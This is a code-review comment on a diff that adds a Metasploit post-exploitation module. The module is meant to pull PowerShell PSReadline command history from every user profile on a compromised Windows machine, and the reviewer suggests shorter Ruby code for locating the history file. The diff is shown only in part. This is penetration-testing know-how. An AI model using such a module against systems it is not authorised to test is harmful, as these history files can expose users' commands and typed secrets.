modules/post/windows/gather/psreadline_history.rb

```diff
@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/windows/user_profiles'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  STORE_FILE_TYPE = 'text/plain'
+
+  def initialize(info={})
+    super(update_info(info,
+        'Name' => 'Windows Gather PSReadline history',
+        'Description' => %q{
+          Gathers Power Shell history data from the target machine.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Garvit Dewan <d.garvit[at]gmail.com>' # @dgarvit
+        ],
+        'Platform' => %w{ win },
+        'SessionTypes' => [ 'meterpreter' ]
+      ))
+  end
+
+  def run
+    grab_user_profiles.each do |userprofile|
+      gather_psreadline_history(userprofile)
+    end
+  end
+
+  #
+  # Check to see if the directory exists on the remote system.
+  #
+  def dir_exists(profile)
+    if profile['AppData'].nil?
+      print_error("PowerShell directory not found for #{profile['UserName']}")
+      return false
+    end
+
+    path = "#{profile['AppData']}\\Microsoft\\Windows"
+    dir = "PowerShell"
+    dirs = session.fs.dir.foreach(path).collect
```

Comment:
This seems unnecessarily complicated. At first I thought you were trying to find directories which match `PowerShell`, in the event that they were named `PowerShell1.0`, `PowerShell2.0`, etc, or something like that.

But later on you've hardcoded `"#{profile[path]}\\Microsoft\\Windows\\PowerShell\\PSReadline"` so that doesn't make sense.

As such, you should be able to eliminate a lot of this code by doing something like this:

```ruby
  def run
    grab_user_profiles.each do |user|
      next if user['AppData'] == nil
      history_path = user['AppData'] + "\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt"
      stat = session.fs.file.stat(history_path) rescue nil
      next if stat.nil?
      gather_psreadline_history(history_path)
    end
  end
```

A lot of the code in `gather_psreadline_history` could also be reduced.